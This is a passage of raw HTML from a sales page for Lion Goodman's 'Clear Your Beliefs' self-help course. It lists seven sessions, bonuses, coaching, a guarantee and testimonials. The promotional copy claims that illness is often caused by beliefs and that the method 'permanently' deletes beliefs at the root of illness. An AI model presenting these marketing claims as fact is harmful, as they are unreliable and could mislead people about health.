src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs 